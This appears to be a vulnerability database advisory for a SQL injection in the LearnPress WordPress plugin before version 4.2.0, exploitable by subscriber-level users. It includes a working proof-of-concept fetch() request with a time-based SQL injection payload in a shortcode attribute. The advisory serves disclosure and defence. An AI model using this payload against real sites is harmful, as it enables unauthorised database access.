LearnPress Plugin < 4.2.0 - Subscriber+ SQLi

2023-01-2400:00:00

wpvulndb

156

learnpress plugin

sql injection

subscriber

web exploitation

0.001 Low

EPSS

Percentile

34.5%

JSON

The plugin does not validate and escape some of its shortcode attributes before using them in SQL statement/s, which could allow any authenticated users, such as subscriber to perform SQL Injection attacks Note: The original advisory mentioned that the issue is only exploitable by contributors, but we confirmed that any authenticated users, such as subscriber, can exploit it.

Run the below command in the developer console of the web browser while being on the blog as a subscriber user

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": "action=parse-media-shortcode&shortcode=[learn_press_recent_courses order=' AND (SELECT 42 FROM (SELECT(SLEEP(5)))b)' limit='1']",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

0.001 Low

EPSS

Percentile

34.5%

JSON

Related for WPEX-ID:58BE94E8-5C21-41B5-BF1D-9B8D9DFDA9A0